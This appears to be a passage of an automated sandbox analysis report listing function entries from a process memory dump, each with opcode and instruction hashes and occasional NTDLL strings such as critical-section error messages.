                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Critical error detected %lx
                                                                                                                          • API String ID: 0-802127002
                                                                                                                          • Opcode ID: a0faf4433a8b0cf951486247eae9e491fb14b785d3f6422a6477b7a4bc15a4ed
                                                                                                                          • Instruction ID: 32bcdb9c6b8afdbbcb1aa4015bee208e594e16d6722124711a3e4a4878c26172
                                                                                                                          • Opcode Fuzzy Hash: a0faf4433a8b0cf951486247eae9e491fb14b785d3f6422a6477b7a4bc15a4ed
                                                                                                                          • Instruction Fuzzy Hash: 1A115B71D55348EBDF24CFA48A0A7DCBBB0BB04715F24825DE429AB2C2C7784601CF14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A5FF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                          • API String ID: 0-1911121157
                                                                                                                          • Opcode ID: e7453161535217a934b15e7c3f95ed4f3dfffe40083d3dab37db3d96cb025ff1
                                                                                                                          • Instruction ID: 6580f1720a3f17af2f05772d796a73801c753c69a142aefebd14c52fe97af0a0
                                                                                                                          • Opcode Fuzzy Hash: e7453161535217a934b15e7c3f95ed4f3dfffe40083d3dab37db3d96cb025ff1
                                                                                                                          • Instruction Fuzzy Hash: 18110071910144EFCB12EB50CE49FD8BBB1FF49715F148464F9096B6A2C7799A88CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 696fee8494e6cfd61a9c92148bfe78f20c05e63c195b1313e2986c4906019a41
                                                                                                                          • Instruction ID: b15ef30e558b00029c1d09c25297201adba9ece4182d37ece6e4fdaa7477dcf0
                                                                                                                          • Opcode Fuzzy Hash: 696fee8494e6cfd61a9c92148bfe78f20c05e63c195b1313e2986c4906019a41
                                                                                                                          • Instruction Fuzzy Hash: 97424875E006298FDF24CF68C981BAAB7F1FF49304F1481AAD84DAB242D7749A85CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 689f97b9a0c93929f2a933932b9b145cd8d2901d729b5a0740d7994dee697017
                                                                                                                          • Instruction ID: acfe2c3c6d5df39c0c30d12d30dd2b2fafb49b1f598aa2109e6892d882efe379
                                                                                                                          • Opcode Fuzzy Hash: 689f97b9a0c93929f2a933932b9b145cd8d2901d729b5a0740d7994dee697017
                                                                                                                          • Instruction Fuzzy Hash: F841B435A4122CABCB21DF64C941FEE77B8EF49700F4144A9FA48AB251DB74DE84CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c138b7ea07dc9f91f5453fa5608d89ff3899f549ebd47118d76849351e78865d
                                                                                                                          • Instruction ID: fe4e0a2b913642f9605428bac051b93b4b7df37854550eb2d134ebd14f1459ef
                                                                                                                          • Opcode Fuzzy Hash: c138b7ea07dc9f91f5453fa5608d89ff3899f549ebd47118d76849351e78865d
                                                                                                                          • Instruction Fuzzy Hash: D5419E71A40318AEEB21DF14CC81FBBB7A9EB45710F1444A9FA499B282D774ED44CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1af41547cd844088ff97389d704c4b3b55bcabafd516c1462e338543af16030e
                                                                                                                          • Instruction ID: 842656ce35b56647b7744633762f88de876c4d63ea57c0524ab00d524d9ad9e3
                                                                                                                          • Opcode Fuzzy Hash: 1af41547cd844088ff97389d704c4b3b55bcabafd516c1462e338543af16030e
                                                                                                                          • Instruction Fuzzy Hash: 4D4154B5A4032C9BDB24DF55DC88AAAB7F8EB54300F1085EBD91997352EB749E80CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                          • Instruction ID: 1a016db797fd812ccbd53fb2e120761786fad8f973bbff0ec756f0ef60ea555b
                                                                                                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                          • Instruction Fuzzy Hash: 56312732F005446BEB15AB69CC49BBFF7BBEFA0350F15806AE805A7291DA74CD00C751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                          • Instruction ID: aa24f58c650a9fff04ca6f6d12f66cce97ea400648d29126cdeae41a0e71eba3
                                                                                                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                          • Instruction Fuzzy Hash: 25311232700646AFD722AB68C945F6ABBEAEBC5350F184078F946CB352DB74DC41C720
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                          • Instruction ID: bb5a1d6a9e99e9f7df8cd3ca510132993de5c05fe6412d8d85cc663f6218b384
                                                                                                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                          • Instruction Fuzzy Hash: 8131A172604705ABC719EF24CD85A6BB7AAFFC4750F04892EF55687741DA30EC05CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bd15bf876af0e3267012ecf4aca43ba05a96a5868ec56d6d888f80d28034187b
                                                                                                                          • Instruction ID: 0f92886b20c9e2e4af91c416734c4390564b8e1400543f2df821d4200cf3fd47
                                                                                                                          • Opcode Fuzzy Hash: bd15bf876af0e3267012ecf4aca43ba05a96a5868ec56d6d888f80d28034187b
                                                                                                                          • Instruction Fuzzy Hash: 7E41DEB5D00608AFCB14CFA9D941BFEBBF8FF89304F14812AE914A7292DB709905CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3235063306cb0b8223734cc00b0371a181c56fbfa1ea6043b3d88cfa20650fef
                                                                                                                          • Instruction ID: b001caaef888d8d19ea65e795ba33a4813270f28bccab274bfe1cf57cb168600
                                                                                                                          • Opcode Fuzzy Hash: 3235063306cb0b8223734cc00b0371a181c56fbfa1ea6043b3d88cfa20650fef
                                                                                                                          • Instruction Fuzzy Hash: A4317731642A10EBC736AB58DC81F6677A9FF40720F214A2AF4294B1E3EB70FC40C691
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c86aa9bfc5b28214913227a6dd73bdea86348e4efd0c0655c818a2bc5a1dc77b
                                                                                                                          • Instruction ID: 089dd54e13c5eeb2a116ca992e1596898a7c150e5e2baae85366d272b447bf8c
                                                                                                                          • Opcode Fuzzy Hash: c86aa9bfc5b28214913227a6dd73bdea86348e4efd0c0655c818a2bc5a1dc77b
                                                                                                                          • Instruction Fuzzy Hash: 4931BE32A04619DFCB24CF2AE841A7ABBF9EF95700B15846AE849CB390E730DD40D790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 10a1fb176ec170d8c8a3d6c7f42860a9483dd230e35b93fd5632965275ab5f09
                                                                                                                          • Instruction ID: 10541680a4bbf41a9dd189b9f154422a602beec6a2cbf97881e8231d6942b6e8
                                                                                                                          • Opcode Fuzzy Hash: 10a1fb176ec170d8c8a3d6c7f42860a9483dd230e35b93fd5632965275ab5f09
                                                                                                                          • Instruction Fuzzy Hash: AE4149B5A04219DFCB05CF68D890BAABBF1BF89300F198169E909AF351D774AD41CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1defd70bd421a3bc0344cc28c3bb5704c2147176a368b9b85e603d53f873fee9
                                                                                                                          • Instruction ID: d18989ebe2af52929f7a00c97b01e07e5ccf55f783712bb340246d8beec4abd0
                                                                                                                          • Opcode Fuzzy Hash: 1defd70bd421a3bc0344cc28c3bb5704c2147176a368b9b85e603d53f873fee9
                                                                                                                          • Instruction Fuzzy Hash: 0631A0766087919BC321DF68CD41A6AB7E9FFC8700F044A29F89597691E730ED04CBA6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                          • Instruction ID: 4f182d2728dd52e4cc808d63b32a2da7c8c376812559bd58df1e5620cdb55021
                                                                                                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                          • Instruction Fuzzy Hash: BF316DB17055C6BED706EBB5C491BE9F754BF82304F18815AE51C47302CB38AD06D7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e7147761c981f883cf2fb8f5249c13fc3d9672817bd3e495c6a2c4002d41d95c
                                                                                                                          • Instruction ID: f590c290df8b5b7db2b08e89ccb4d004d2206abccd522261a7e5592edc46d18f
                                                                                                                          • Opcode Fuzzy Hash: e7147761c981f883cf2fb8f5249c13fc3d9672817bd3e495c6a2c4002d41d95c
                                                                                                                          • Instruction Fuzzy Hash: A6316972A09302DFCB14DF28D98155ABBE5FF85700F06896EF4989B252D730DE45CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1dab58c4e6b6015700b662ae15a40d1aa4e04c3870ad44bdc32155a834ba81c2
                                                                                                                          • Instruction ID: 8539b9da722d82c9b010f89333ca0f33c1d3c870f34e2b7e6b8d651c29dd9d1e
                                                                                                                          • Opcode Fuzzy Hash: 1dab58c4e6b6015700b662ae15a40d1aa4e04c3870ad44bdc32155a834ba81c2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 1d93b6f74106c185f606330e491907134908145c3bbf47d3d443fdd2828051ef
                                                                                                                          • Instruction ID: 0a3169556fe5924602135976ad21d35e3acc493e2bdc1f52584c655118e8a3a8
                                                                                                                          • Opcode Fuzzy Hash: 1d93b6f74106c185f606330e491907134908145c3bbf47d3d443fdd2828051ef
                                                                                                                          • Instruction Fuzzy Hash: 29215931441A41EFC726EF68CE01F5AB7B9BF08704F04496CE04A866B3CB39E942CB45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9c40c918f2a7531f7d1025d4b1fbdb6779423702bbbcf6a2d698c3bae4154a02
                                                                                                                          • Instruction ID: 59134c05b3ac0f40866513965f0af24a3d3ee6704dbbafce98fe2181668b800c
                                                                                                                          • Opcode Fuzzy Hash: 9c40c918f2a7531f7d1025d4b1fbdb6779423702bbbcf6a2d698c3bae4154a02
                                                                                                                          • Instruction Fuzzy Hash: 6B1148373461249BCB199E19DD81A6BB39EEBD5330F250139EA168B380CE759C02C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bd832322342f5ec5cab7f616df65bbc36ef44a36b8749902c70a5b0bf0de3707
                                                                                                                          • Instruction ID: 9867403e526efe8eb30e6fc23399a7dbc50b8e32f2fb6c7d2bb6bcea04be9345
                                                                                                                          • Opcode Fuzzy Hash: bd832322342f5ec5cab7f616df65bbc36ef44a36b8749902c70a5b0bf0de3707
                                                                                                                          • Instruction Fuzzy Hash: 7B212F70501B01CFC715DFA8D500A587BB9FB8931EF20826AE5198B2B2DF3598C6CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f06616201d958eb785afa1fdc795083b877a4a3bfd0e10b399dbb915f054abe4
                                                                                                                          • Instruction ID: b9444ad97e7a7c391279e7ffd09251cdf46250cdec046079e18173417cd6c476
                                                                                                                          • Opcode Fuzzy Hash: f06616201d958eb785afa1fdc795083b877a4a3bfd0e10b399dbb915f054abe4
                                                                                                                          • Instruction Fuzzy Hash: F411487270075467D730A72E9C51B26B7CDAB90B10F144536F7069B1A2D9B8DC01D794
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                          • Instruction ID: d4bb859b3d3f11ae81d19785023aa77c86df096484fa9067563eceab790597d5
                                                                                                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                          • Instruction Fuzzy Hash: 16110272504208BBCB059F5DA8809BEF7B9EFD9300F10806AF9448B351DA318D51D3A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: be2ea6d83346a74509511be4fb5d079493615e65b33f24a4659f7f1ebf38aba5
                                                                                                                          • Instruction ID: fdff38ce9414aa502d97b0b44c77653675b799ef6fc5f9e7f61d0685c257bbb0
                                                                                                                          • Opcode Fuzzy Hash: be2ea6d83346a74509511be4fb5d079493615e65b33f24a4659f7f1ebf38aba5
                                                                                                                          • Instruction Fuzzy Hash: B9110E313086469BC720BF28DC82A6EB7E5BBC4310F00163AF845876A2EB60EC00D7D1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e8d19837a3c1368856417f336635d8cd9eb82a41cd2f01409d3559a0812d1865
                                                                                                                          • Instruction ID: a7407f5aefff68ea8da3bda6ca249ed1722a12585a6ea5b4b3df76b8a7b828bb
                                                                                                                          • Opcode Fuzzy Hash: e8d19837a3c1368856417f336635d8cd9eb82a41cd2f01409d3559a0812d1865
                                                                                                                          • Instruction Fuzzy Hash: 7901D6739056149BCB3B8B5EA940E26BBAEDFC5B50B15C0E9F9458B391DB30CE05C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                          • Instruction ID: f56226983d354690a5506c6735ba076df7d0bd611bffcfd1ca3063137fd2621c
                                                                                                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                          • Instruction Fuzzy Hash: 01118E326056C9CFD7229B69D945B35B7D8EF85754F1D00A0FE04876A3DB28EC81C761
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                          • Instruction ID: ab440f134196aed731582ffba2ae92583b9dbe0df8a5146d067121cbb36e9292
                                                                                                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                          • Instruction Fuzzy Hash: 0E01843274451DABC7209E9ECC51E6BB7ADFB84BA0B644539B908CB350FA70DD0187A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 34fcfd6be1342a3f9ea8e55598a9db82822ba0d764018ecda78531486eaa33c5
                                                                                                                          • Instruction ID: 55c2eeb0b21eb3c26937265e6af0ed6f48ca73acf1c0d7ecb9312c9250d850be
                                                                                                                          • Opcode Fuzzy Hash: 34fcfd6be1342a3f9ea8e55598a9db82822ba0d764018ecda78531486eaa33c5
                                                                                                                          • Instruction Fuzzy Hash: DD01AF72E016049FD329DF18D844B22BBEDEB85761F25417AE5058F7A2C774DC41CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                          • Instruction ID: 2c108ee15be58e62bed5ca24d3150e504dd9fa7f6bca43af4cf1b7848155521d
                                                                                                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                          • Instruction Fuzzy Hash: B701F172140609BFD722AF66DD85E63F77DFF843A1F008525F204425A2CB32ECA4CAA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fa6b1c686f920fac42977fe5c228780d89b1c210a9015a31a9c4274bfc2e3d07
                                                                                                                          • Instruction ID: 16bd43979f8a9d933fb020e4658ed6cb0140bb9d0f8992f98372702d65c97fb3
                                                                                                                          • Opcode Fuzzy Hash: fa6b1c686f920fac42977fe5c228780d89b1c210a9015a31a9c4274bfc2e3d07
                                                                                                                          • Instruction Fuzzy Hash: 16018F722419857FC615AB6ACD81F53B7ACFB89760B000629B60887A12DB38EC11C6E4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d1d2d016a7baa72e4e19de3617e0b4cbf299e8ff6a7f879c58c0c6390f4829f
                                                                                                                          • Instruction ID: 8aa33756d4b8f2bd325520dbe9e4e774e35ca91b7756f8dcce249669b1859aef
                                                                                                                          • Opcode Fuzzy Hash: 1d1d2d016a7baa72e4e19de3617e0b4cbf299e8ff6a7f879c58c0c6390f4829f
                                                                                                                          • Instruction Fuzzy Hash: 2C015271A0425CAFCB14EFA9D942FAEB7B8EF44710F004066B904EB681E674DE41C795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 318153260633fcf869dda0d62ccbc7f7fca38735e97b277db5a0689614b6143e
                                                                                                                          • Instruction ID: d55cb123ea2d2dc3af191694ce336607d980bc3b5df03a4b05b9fe25f8b24ab3
                                                                                                                          • Opcode Fuzzy Hash: 318153260633fcf869dda0d62ccbc7f7fca38735e97b277db5a0689614b6143e
                                                                                                                          • Instruction Fuzzy Hash: D7019271A0024CAFCB14EFA9D942EAEB7B8EF44700F004066F904EB281D671DE01CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 69097a9fd85c26c923277ebcc19cc175758a3c55e68b50e7e82895955ab9e7e1
                                                                                                                          • Instruction ID: e12a69bbc7901652383b42b2bbb5d47ce063936aae2b4223a48d9331fa197005
                                                                                                                          • Opcode Fuzzy Hash: 69097a9fd85c26c923277ebcc19cc175758a3c55e68b50e7e82895955ab9e7e1
                                                                                                                          • Instruction Fuzzy Hash: 5801D431E04904DBC714EF78DD01EAE73ECEB84320F9600A9A8059B252DF30ED42C691
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0e1aafe81430b68ea459da6bcc134c640fa15770e0a850a100ca9f2464bc8d6a
                                                                                                                          • Instruction ID: c9b6fcd8e7c9bcfc1995b218f005daf4d13649db5eacaf150004e64addca69cb
                                                                                                                          • Opcode Fuzzy Hash: 0e1aafe81430b68ea459da6bcc134c640fa15770e0a850a100ca9f2464bc8d6a
                                                                                                                          • Instruction Fuzzy Hash: ACF08270A0424CAFCB04DBA9E946EAE77F4EF49300F100199F915EB2D2EA34DD00C755
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4dd0e8cf9a7ec6fe58474533b7f5162bb834efb2d348d04a1c2630633c3cc029
                                                                                                                          • Instruction ID: 18960c18721ab787f4fee00ec8749131a8d1307343b9d4b67b8ce346e1005b05
                                                                                                                          • Opcode Fuzzy Hash: 4dd0e8cf9a7ec6fe58474533b7f5162bb834efb2d348d04a1c2630633c3cc029
                                                                                                                          • Instruction Fuzzy Hash: 6BF0B4345081C4BADF1397EAD840B79FBB7AF04350F140525E851AB1F1F7699C008787
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
